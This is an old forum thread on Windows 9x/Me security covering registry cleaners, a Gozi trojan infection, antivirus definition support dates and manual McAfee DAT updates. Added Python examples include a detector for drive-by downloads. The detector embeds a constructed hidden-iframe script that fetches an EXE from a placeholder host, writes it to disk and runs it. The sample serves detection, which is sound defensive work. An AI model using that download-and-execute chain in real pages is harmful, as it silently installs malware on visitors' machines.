Windows 9x/Me Security Thread

114 posts in this topic

I tried using Eusing Free Registry Cleaner and all it did was delete a bunch of "un-used" file extensions like .zip, .bmp, .jpg and other important file associations... Basically all Eusing did was screw up my computer.
I usually don't try out old little-known Win98 stuff without the recommendation by somebody of authority (like members of msfn.org :) ), unless I am searching for something very specific and after having done some research on my own. In any case, it's good to hear which old can of worms one should definitely not open.

My system is very well backed up, and an opsys restore to the exact state prior to the testing takes me about 10-20 minutes, so if something looks good, I may wind up trying it out.


Jetico blocked the gozi trojan from accessing the network for fetching some other files when it was still a zero-day and went undetected by my then real time antivirus.

According to this: http://www.secureworks.com/research/threats/gozi/ the exploit that was used to transfer gozi to your computer used a hidden iframe containing "JavaScript code using XMLHTTP and ADODB (ActiveX Data Objects) functions to download and run an EXE file which was hosted on the same server". This likely happened no earlier than December 2006, and more likely during the first half of 2007.

I think that for gozi to infect a system, the system must have the MS04-025 (Navigation Method Cross-Domain) vulnerability. This would have been patched as part of an IE 5.5 or IE6 cumulative update for various versions of Windows (including win-98 I believe). You would also have to be using IE for your browser and would have browsed to one of an estimated 2000 hijacked servers that were serving up the hidden iFrame containing the Javascript exploit code. And I'm really not convinced that the gozi infector or loader would have successfully launched itself and operated properly if it found itself on a win-9x system in the first place.

Would you by chance have been running a dual-boot win-98/XP system back during the first half of 2007?

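The delivery pattern the SecureWorks write-up quoted above describes (a hidden iframe whose page uses XMLHTTP to fetch an EXE, ADODB.Stream to write it to disk, then launches it) is also usable as a detection signature for captured pages. The following Python is an added example, not code from the thread, from SecureWorks or from Gozi itself; the HTML it scans is constructed to resemble that pattern, and the hostnames, paths and file names in it are placeholders.

```python
import re

# Constructed sample resembling the hidden-iframe + download-and-run pattern.
# NOT real Gozi delivery code; hosts and paths are placeholders.
SAMPLE_HTML = r"""
<html><body>
<p>Welcome to the site</p>
<iframe src="http://example.invalid/ld.htm" width="0" height="0" style="visibility:hidden"></iframe>
<script>
var x = new ActiveXObject("Microsoft.XMLHTTP");
x.open("GET", "http://example.invalid/load.exe", false);
x.send();
var s = new ActiveXObject("ADODB.Stream");
s.Type = 1; s.Open(); s.Write(x.responseBody);
s.SaveToFile("C:\\WINDOWS\\TEMP\\ld.exe", 2);
new ActiveXObject("WScript.Shell").Run("C:\\WINDOWS\\TEMP\\ld.exe");
</script>
</body></html>
"""

# Constructed benign page: a normal-sized ad iframe and an ordinary XHR call.
BENIGN_HTML = r"""
<html><body>
<iframe src="http://example.invalid/ad.htm" width="300" height="250"></iframe>
<script>var x = new XMLHttpRequest(); x.open("GET", "/api/data", true); x.send();</script>
</body></html>
"""

# An iframe sized to zero or styled invisible is the "hidden iframe" the write-up mentions.
HIDDEN_IFRAME = re.compile(
    r'<iframe\b[^>]*(?:\bwidth\s*=\s*["\']?0\b|\bheight\s*=\s*["\']?0\b'
    r'|visibility\s*:\s*hidden|display\s*:\s*none)[^>]*>',
    re.IGNORECASE)

# Each indicator is one link of the download-and-execute chain.
INDICATORS = {
    "xmlhttp":      re.compile(r'ActiveXObject\s*\(\s*["\'](?:Microsoft|MSXML2)\.XMLHTTP', re.I),
    "adodb_stream": re.compile(r'ActiveXObject\s*\(\s*["\']ADODB\.Stream', re.I),
    "save_to_file": re.compile(r'\.SaveToFile\s*\(', re.I),
    "exec":         re.compile(r'WScript\.Shell["\']\s*\)\s*\.Run\s*\('
                               r'|Shell\.Application["\']\s*\)\s*\.ShellExecute\s*\(', re.I),
    "exe_url":      re.compile(r'https?://[^\s"\']+\.exe\b', re.I),
    # Crude obfuscation markers; real kits hide the strings above behind these.
    "obfuscation":  re.compile(r'\bunescape\s*\(|String\.fromCharCode\s*\(|\beval\s*\(', re.I),
}

def find_hidden_iframes(html: str) -> list:
    """Return the raw <iframe ...> tags that are zero-sized or styled invisible."""
    return HIDDEN_IFRAME.findall(html)

def find_indicators(html: str) -> dict:
    """Return {indicator_name: bool} for each link of the chain."""
    return {name: bool(rx.search(html)) for name, rx in INDICATORS.items()}

def assess(html: str) -> dict:
    """Flag a page as a drive-by download only when the whole chain is present:
    fetch (XMLHTTP) + write (ADODB.Stream/SaveToFile) + execute (WScript/Shell)."""
    ind = find_indicators(html)
    chain = ind["xmlhttp"] and ind["adodb_stream"] and ind["save_to_file"] and ind["exec"]
    hidden = find_hidden_iframes(html)
    return {
        "hidden_iframes": len(hidden),
        "indicators": ind,
        "drive_by": chain,
        # A hidden iframe alone is only suspicious; report it separately.
        "suspicious": chain or (len(hidden) > 0 and ind["exe_url"]),
    }

if __name__ == "__main__":
    for label, page in (("sample", SAMPLE_HTML), ("benign", BENIGN_HTML)):
        print(label, assess(page))
```

This matches only the literal, unobfuscated form of the chain, which is what the write-up describes; kits of that era already split or escaped the ActiveX strings, so treat the `obfuscation` flag as a reason to deobfuscate and rescan rather than as a verdict. The intended input is a page captured from a proxy or from a saved browser cache, not a live fetch from the hijacked server.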

As I've said I got Gozi on my machine through an Internet Explorer javascript/activeX exploit and the details you copy/pasted about it are most certainly correct.

I got infected at the beginning of February 2007, I believe, and FWIW I also believe I was the first person in the world to post about it in forums. From what I was told by phone afterwards by a guy claiming to be an IT security journalist, who first contacted me about it by PM, the gozi virus was already known to major software security companies, but none had published anything about it or had any signatures for it yet.

And no, I wasn't running a dual-boot system, only Windows ME, and, as I have already said, even if you don't believe it for whatever reason, Jetico successfully blocked a first executable from downloading another one, which means it was actually running without crashing on my machine.

I also got infected by a rootkit once, it was nearly undetectable, invisible file, invisible process and invisible registry startup key. Yes there are rootkits for Win 9x as well... :w00t:

Edited by loblo

I tried using Eusing Free Registry Cleaner and all it did was delete a bunch of "un-used" file extensions like .zip, .bmp, .jpg and other important file associations.

So then I had to re-associate all those file extensions with the correct programs. Basically all Eusing did was screw up my computer.

The only registry cleaner I use is the one inside CCleaner.

All registry cleaners should be used with caution. CCleaner isn't foolproof either, as it listed registry entries that I know are in use. They should be used as a guide while manually cleaning the registry. Since it's really tedious to often check every nook and cranny of the registry by hand, I find that these can aid in that area. Always review what they've found first before allowing them to delete any entry, and always back up before committing the removal. I personally use Eusing Free Registry Cleaner as part of my registry cleaning toolkit, along with a few others (a second or third or fourth opinion is always nice), and it has been working fine for me.

One thing I never liked about registry cleaners is the way they often refer to the detected entries: "215 errors found"... issues/problems/etc. It should be more like "215 possible unused entries, remove only if you are sure of what you're doing." And beware of registry cleaners that detect an exorbitant number of entries, "2154 errors found." :rolleyes: Why not just flag the entire hive while you're at it?

And beware of registry cleaners that detect an exorbitant number of entries, "2154 errors found." :rolleyes:

I am not sure you really know what you are talking about... :rolleyes:


I am not sure you really know what you are talking about... :rolleyes:

I admit I was exaggerating for effect. I experimented with many registry cleaners, and some detect significantly more "errors" than others by a wide margin, a very wide margin. Unfortunately, inexperienced users can be fooled by those inflated numbers, thinking that certain cleaners are more thorough, when they're really increasing the chances of a corrupt registry.


With most support for Win 9x antivirus and antimalware programs coming to an end, I try to keep an eye on some that are still supported.

Kaspersky 6.0.2.621 virus definitions will be provided until October 2012.

Avast 4.8.1335 virus definitions will be provided until May 2012.

Eset NOD32 2.70.39 virus definitions will be provided until February 2012.

AVG 7.5.557 support has officially ended. Their definitions continue to work, but compatibility could end at any time.

Spybot 1.6.2 is currently supported, but with Beta 2.0 available and quite overdue, it could end soon.

SpywareBlaster 4.4 is currently supported. No sign of when that may end.

2012 is the magic year. Like Multibooter, I suggest downloading and archiving definitions while we still can so at the very least we'll have the most recent version that can still be used years from now when all support has finally ceased.

Edited for clarity

Edited by Foxbat

With most support for Win 9x antivirus and antimalware programs coming to an end, I try to keep an eye on some that are still supported.

Norton Anti-Virus 2002 can still be updated by downloading the (free) Symantec Intelligent Updater package.

If you once had NAV 2002 on your system, or if you've uninstalled it completely (including deleting the file catalog.livesubscribe) then you can re-install it and it will accept new virus definition updates (from the intelligent updater package) for a year.

If you once had NAV 2002 on your system, or if you've uninstalled it completely (including deleting the file catalog.livesubscribe) then you can re-install it and it will accept new virus definition updates (from the intelligent updater package) for a year.
You are aware that there's a "cleanwipe" program made by Symantec to clean remnants of any NAV/NIS in preparation for SEP? I haven't tested it with NAV2002 but it works fine with later versions.

On topic, there's already a topic on firewalls. I had recommended Outpost (see post #33 and #40 for links and info).

You are aware that there's a "cleanwipe" program made by Symantec to clean remnants of any NAV/NIS in preparation for SEP? I haven't tested it with NAV2002 but it works fine with later versions.

NAV 2002 doesn't really require special utilities to uninstall or remove it from your system (it's not that complicated or invasive in that regard). But I agree that later versions do require such utilities. But even then I doubt that the file "catalog.livesubscribe" gets removed by any method - you normally have to remove that manually. Unless you remove that file, you can't re-install NAV such that you reset the 1-year virus-definition update clock.


Avast 4.8.1335 will be supported until May 2012.

Thanks. I was wondering when Avast! was going to discontinue support for Win9x as it was originally supposed to end last year. Just curious, where did you find that information?

I'm kinda surprised herbalist hasn't joined the discussion but this topic gets periodically rehashed over and over. It's too bad there isn't some good way to consolidate all of the information.


Of course there is a way... I can consolidate the previous threads into one. But that would create a huge thread.

So I don't know for sure whether it's such a good idea. Do please post a list of previous threads you think would fit in.

Then we can decide what's the best course to adopt.


Avast 4.8.1335 will be supported until May 2012.

Thanks. I was wondering when Avast! was going to discontinue support for Win9x as it was originally supposed to end last year. Just curious, where did you find that information?

Yes, Win 9x support ended at the end of 2009. I was referring to the support of virus definitions. I'll fix my post to reflect that.


Well, this thread gave me an excuse to tie up an old loose-end, to see if my old McAfee v6 scanner is still working on Win9x with the latest DATs. I haven't tried this in quite a while since I have other computers configured for AV security functions, mostly WinXP which crashes less and is quicker to recover from a BSOD.

First, I should mention that I never allow these things to auto-update or even to update DATs, I was never interested in realtime protection or letting them automatically update engines or DATs. Instead, I always backed up the previous working DATs and then manually extract the *latest* available DATs and then place the files where they belong. This allows me to fall back to the previous set in the case of a McAfee screwup.

Secondly, and more importantly, this McAfee installation had been highly tamed. Every part unrelated to ON-DEMAND scanning was removed. There was a ton of registry editing, killing all autostart entries and drivers, removing 99% of the MSI Windows Installer references, associations and hooks. Essentially it has been neutered so that it never ran unless I right-clicked a folder and selected the McAfee shell/folder registry entry I made.

The executable McAfee file is VSMAIN.EXE and shows v6.01.2000.1 dated: 2001-11-16.

The two McAfee FTP sites I located are:

ftp://ftp.mcafee.com/pub/antivirus/superdat/intel/

ftp://ftp.mcafee.com/pub/datfiles/english/

Giving me three total files to download:

ftp://ftp.mcafee.com/pub/datfiles/english/avvdat-6346.tar

ftp://ftp.mcafee.com/pub/antivirus/superdat/intel/sdat6346.exe

ftp://ftp.mcafee.com/pub/antivirus/superdat/intel/6346xdat.exe

Man, they are really getting very large these days:

- 111,632,528 . 05-15-11 . 2:03a 6346xdat.exe <------- use /e to extract

- 109,750,272 . 05-15-11 . 2:05a Avvdat-6346.tar <---- just use WinZip

- 117,434,304 . 05-15-11 . 2:05a Sdat6346.exe <------- use /e to extract

Here they are extracted into folders. Note, all the extra hyphens or dots are to keep the columns aligned. The style sheet for this forum software insists on collapsing multiple spaces into one, there seems to be no way to imply the <PRE> tag.

;----------- Avvdat-6346(.tar)

..... 569,961 . 05-14-11 . 1:40a Avvclean.dat

..... 423,049 . 05-14-11 . 1:40a Avvnames.dat

. 108,744,302 . 05-14-11 . 1:40a Avvscan.dat

....... 8,689 . 05-14-11 . 1:40a Legal.txt

;----------- 6346xdat(.exe)

..... 569,961 . 05-14-11 . 6:40a Avvclean.dat <=== IDENTICAL to Avvdat-6346.tar

..... 423,049 . 05-14-11 . 6:40a Avvnames.dat <=== IDENTICAL to Avvdat-6346.tar

. 108,744,302 . 05-14-11 . 6:40a Avvscan.dat <==== IDENTICAL to Avvdat-6346.tar

......... 783 . 05-14-11 . 3:50a Globals.nsg

..... 157,696 . 05-14-11 . 3:50a Gsdsuper.dll

...... 34,644 . 05-14-11 .12:07p Naiscrip.nsc

......... 401 . 05-14-11 . 3:50a Sdatpack.lst

;----------- Sdat6346(.exe)

..... 569,961 . 05-14-11 . 6:40a Avvclean.dat <=== IDENTICAL to Avvdat-6346.tar

..... 423,049 . 05-14-11 . 6:40a Avvnames.dat <=== IDENTICAL to Avvdat-6346.tar

. 108,744,302 . 05-14-11 . 6:40a Avvscan.dat <==== IDENTICAL to Avvdat-6346.tar

....... 5,644 . 07-31-09 . 6:40a Config.dat

......... 783 . 05-14-11 . 3:50a Globals.nsg

..... 157,696 . 05-14-11 . 3:50a Gsdsuper.dll

..... 159,744 . 07-31-09 . 6:40a Mcprodinfo.exe

... 3,182,712 . 07-31-09 . 6:40a Mcscan32.dll ... (engine) IDENTICAL to existing

... 4,706,936 . 07-31-09 . 6:40a Mscan64a.dll

...... 93,794 . 05-14-11 .12:07p Naiscrip.nsc

......... 562 . 05-14-11 . 3:50a Sdatpack.lst

....... 7,842 . 07-31-09 . 6:40a Signlic.txt

....... 5,644 . 07-31-09 . 6:40a __X64_Config.dat

....... 7,842 . 07-31-09 . 6:40a __X64_Signlic.txt

....... 1,056 . 07-31-09 . 6:40a __X64_License.dat

So it looks like you only need to download that one TAR file to get the current DATs, the pertinent files are identical, the superfluous files are unnecessary.

First I determined that the target location for the DATs and Engine is in here:

<YourPath>\McAfee\Network Associates\Virusscan Engine\4.0.xx

Then I compared the Mcscan32.dll from Sdat6346.exe against the existing old one and they are still identical. Cool!

So I grabbed the three DAT files and realized that they are using new names these days with 'AVV' prepended, so first I had to rename them ...

..... 569,961 . 05-14-11 . 1:40a Avvclean.dat RENAME TO: Clean.dat

..... 423,049 . 05-14-11 . 1:40a Avvnames.dat RENAME TO: Names.dat

. 108,744,302 . 05-14-11 . 1:40a Avvscan.dat .RENAME TO: Scan.dat

Then off they go into the above-mentioned folder.

Ok, fire up McAfee v6 by rightclicking a test folder. Note, this step from click to the McAfee GUI took a loooonnnng time, at least 5 minutes! Whatever.

Finally ... "Security Status" page shows this ...

Virus Definitions: 4.0.6346

Created On: 05/14/2011

Bingo! They were recognized. I let it scan the folder (fast as ever). Success! on this ten-year-old engine.

Hope this is good news for somebody.

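The manual DAT update in the post above is three steps: confirm the DAT files in the TAR and the two SuperDAT packages are really identical, back up the DATs currently in the engine folder so a bad set can be rolled back, then copy the new files in under the old names (Avvclean.dat to Clean.dat and so on). The Python below is an added example of that procedure, not code from the post or from McAfee; it works on a temporary fixture of tiny constructed files (not real DATs) so it runs offline, and the engine folder path and archive folder names are assumptions. Note that cross-checking the three archives against each other only proves they agree with one another, not that the plain-FTP download was authentic, which is one more reason to keep the previous set.

```python
import hashlib
import shutil
import tempfile
from pathlib import Path

# Names inside current DAT archives -> names the 2001-era engine expects.
DAT_RENAMES = {
    "Avvclean.dat": "Clean.dat",
    "Avvnames.dat": "Names.dat",
    "Avvscan.dat": "Scan.dat",
}

def sha256_of(path: Path) -> str:
    """Hash a file in chunks; the real Avvscan.dat is over 100 MB."""
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(1 << 20), b""):
            h.update(chunk)
    return h.hexdigest()

def compare_dat_sets(dir_a: Path, dir_b: Path) -> dict:
    """Return {name: True/False}: is each DAT byte-identical in both extractions?
    Size and date (what the post compared by eye) can agree while contents differ."""
    return {name: sha256_of(dir_a / name) == sha256_of(dir_b / name) for name in DAT_RENAMES}

def install_dats(src: Path, engine_dir: Path, backup_dir: Path) -> list:
    """Back up the current DATs, then copy the new ones in under the old names.
    Refuses to touch the engine folder unless all three new files are present."""
    missing = [n for n in DAT_RENAMES if not (src / n).is_file()]
    if missing:
        raise FileNotFoundError(f"incomplete DAT set, missing: {missing}")
    backup_dir.mkdir(parents=True, exist_ok=True)
    for old_name in DAT_RENAMES.values():
        current = engine_dir / old_name
        if current.is_file():
            shutil.copy2(current, backup_dir / old_name)
    installed = []
    for new_name, old_name in DAT_RENAMES.items():
        shutil.copy2(src / new_name, engine_dir / old_name)
        installed.append(old_name)
    return installed

def rollback(backup_dir: Path, engine_dir: Path) -> list:
    """Put the backed-up DATs back (the 'fall back in case of a screwup' step)."""
    restored = []
    for old_name in DAT_RENAMES.values():
        saved = backup_dir / old_name
        if saved.is_file():
            shutil.copy2(saved, engine_dir / old_name)
            restored.append(old_name)
    return restored

def demo() -> dict:
    """Run the whole procedure on a constructed fixture (fake DATs, not McAfee data).
    One file in the SuperDAT copy is deliberately altered to show the hash check catching it."""
    root = Path(tempfile.mkdtemp())
    tar_dir, sdat_dir = root / "avvdat", root / "sdat"
    engine = root / "McAfee" / "Network Associates" / "Virusscan Engine" / "4.0.xx"  # assumed layout
    backup = root / "dat-backup"
    for d in (tar_dir, sdat_dir, engine):
        d.mkdir(parents=True)
    for name in DAT_RENAMES:
        (tar_dir / name).write_bytes(b"NEW-" + name.encode())
        (sdat_dir / name).write_bytes(b"NEW-" + name.encode())
    (sdat_dir / "Avvscan.dat").write_bytes(b"NEW-Avvscan.dat-altered")  # simulated mismatch
    for old_name in DAT_RENAMES.values():
        (engine / old_name).write_bytes(b"OLD-" + old_name.encode())
    try:
        identical = compare_dat_sets(tar_dir, sdat_dir)
        installed = install_dats(tar_dir, engine, backup)
        after_install = (engine / "Scan.dat").read_bytes()
        restored = rollback(backup, engine)
        after_rollback = (engine / "Scan.dat").read_bytes()
    finally:
        shutil.rmtree(root)
    return {"identical": identical, "installed": installed, "after_install": after_install,
            "restored": restored, "after_rollback": after_rollback}

if __name__ == "__main__":
    print(demo())
```

On a real system, point `install_dats` at the folder you extracted Avvdat-6346.tar into and at the engine folder named in the post, and keep the backup folder outside the engine tree; the 1.40a versus 6.40a timestamps in the listings are harmless once the hashes match.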

Avast 4.8.1335 will be supported until May 2012.

Thanks. I was wondering when Avast! was going to discontinue support for Win9x as it was originally supposed to end last year. Just curious, where did you find that information?

Yes, Win 9x support ended at the end of 2009. I was referring to the support of virus definitions. I'll fix my post to reflect that.

@Foxbat:

I understood what you meant. I was also referring to virus definitions support, which was supposed to be discontinued at the end of 2010 but has surprisingly still continued.

Of course there is a way... I can consolidate the previous threads into one. But that would create a huge thread.

So I don't know for sure whether it's such a good idea. Do please post a list of previous threads you think would fit in.

Then we can decide what's the best course to adopt.

@dencorso:

Thanks. Now that I think about it, seems like you did something similar for the "Large HDDs >137 GB" topic where you created a "super" post with links to all the relevant threads. I'll look for those threads and get back to you.

@CharlotteTheHarlot:

That's interesting that McAfee 6 still works with the latest definitions. My first AV was McAfee 4.0.3 and I used it for an extremely long time, updating it with the sdat files you referenced, until it became way too slow. As I recall, it caused overall system response to become so sluggish as to be almost unusable. Along the way, they also provided a free download of version 8 to settle some class action lawsuit. I tried it but didn't like it for some reason.

Edited by Prozactive

I understood what you meant. I was also referring to virus definitions support, which was supposed to be discontinued at the end of 2010 but has surprisingly still continued.

The source of the definitions support date was directly from Avast's website over a year ago. Now, a Google search brings up multiple forums all referring to one user asking an Avast rep whose response was that definitions will be supported until the end of 2010. This causes some confusion. It's possible Avast may have changed the date somewhere down the line, but they are still releasing updated 4.8 definitions from their website, which is concurrent with their original end date.


Holy heck, I'm floored. I didn't think any of the outdated A/Vs could get updates. I had thought of getting an older yet somewhat recent A/V but never really put any more thought into it. I use WOT in Pale Moon, which I have in a version specialized for Pentium 3s, and if you don't know, Pale Moon is a Windows-optimized version of FF. Anyway, I didn't think there was anything left for 98SE. It might be interesting to scan it some time, but for the most part I don't have or run anything as far as A/V goes; I'm sure it helps with performance some.


ClamWin AV .97.1 has been released. It's not noted in the change log but this update has added QRecover support for Win98 and WinME. QRecover (a ClamWin utility aka Quarantine Browser) allows users to easily restore files from quarantine, if necessary.

http://www.filehippo.com/download_clamwin

This new version works great with Clam Sentinel 1.16, which acts as its integrated real-time front end.

Edit: adding ClamWin Portable .97.1 (states for Win2k and higher, but works on Win98 and probably WinME without KernelEx). Can be used in conjunction with Clam Sentinel from a flash drive. See the two guides at the bottom of http://clamsentinel.sourceforge.net for setup procedures. Also, I could never get ClamWin (installed or portable) to scan a NTFS volume even with Paragon's NTFS for Win98 installed. My remedy was to re-format the NTFS drive to FAT32. This is a ClamWin problem, not Clam Sentinel.

Edited by Lipper

Editing a post doesn't bump a thread on this forum, so I'm manually bumping that others will know there's new content. :thumbup


That's expected the older an OS gets. But, two antivirus programs still support Windows 95:

Avast 4.8

Eset NOD32 2.7

See post #32 for support dates.


... 3,182,712 . 07-31-09 . 6:40a Mcscan32.dll ... (engine) IDENTICAL to existing

What version is your Mcscan32.dll?

Does anyone have access to 5100eng9x.exe?

Edited by PROBLEMCHYLD